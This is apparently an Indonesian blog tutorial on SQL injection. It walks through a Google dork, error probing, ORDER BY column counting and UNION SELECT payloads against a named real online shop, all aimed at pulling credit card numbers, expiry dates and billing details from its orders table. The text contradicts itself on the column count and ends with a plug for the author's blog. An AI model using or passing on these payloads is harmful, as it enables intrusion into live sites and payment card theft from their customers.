1.Cari Target Masukkan di google inurl:"customer_testimonials.php?&testimonial_id=" nemu target kan? http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=9999
2.Cek kutu , tambahin ' pada akhir url http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=9999' Jika terjadi pesan error ..... hehehehe.......... mode senang on...... 3.Tambahin - setelah = , agar bisa kita susupin sql command http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 4.Gunain perintah order by ampe nemu error Unknown column 'x' in 'order clause' http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 1-- <---- gak ada eror http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 2-- <---- gak ada eror http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 3-- <---- gak ada eror http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 4-- <---- gak ada eror http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 5-- <---- gak ada error http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 6-- <---- gak ada error http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 7-- <---- gak ada error http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 8-- <---- gak ada error http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 9-- <---- ada error Ok.... sekarang kita tauwebnya punya 7 kolom.............. 4.Sekarang union beraksi, kita bakal tau nomor kolomnya http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,6,7,8-- Ok.... maka keluar nomor 6..... 5.Sekarang kita intip nama tabelnya http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,table_name,7,8 from information_schema.tables-- WAh...... ada tabel orders tu.... enyak enyak enyak.... 6.Sekarang kita intip kolomnya.... http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,column_name,7,8 from information_schema.columns-- OK.... udah liat kan..... targetnya adalah.... cc_expires,cc_number,cc_owner,payment_method,cc_type,billing_country,billing_state,billing_postcode,billing_city,billing_street_address,billing_company,billing_name 7.Sekarang kita coba intip cc_expiresnya http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,cc_expires,7,8 from orders-- 8.Sekarang kita intip cc_numbernya http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,cc_number,7,8 from orders-- MAU TAU KELANJUTANNYA???? BUKA AJA a-dwisatya.blogspot.com Nikmati chatting lebih sering di blog dan situs web. Gunakan Wizard Pembuat Pingbox Online. http://id.messenger.yahoo.com/pingbox/
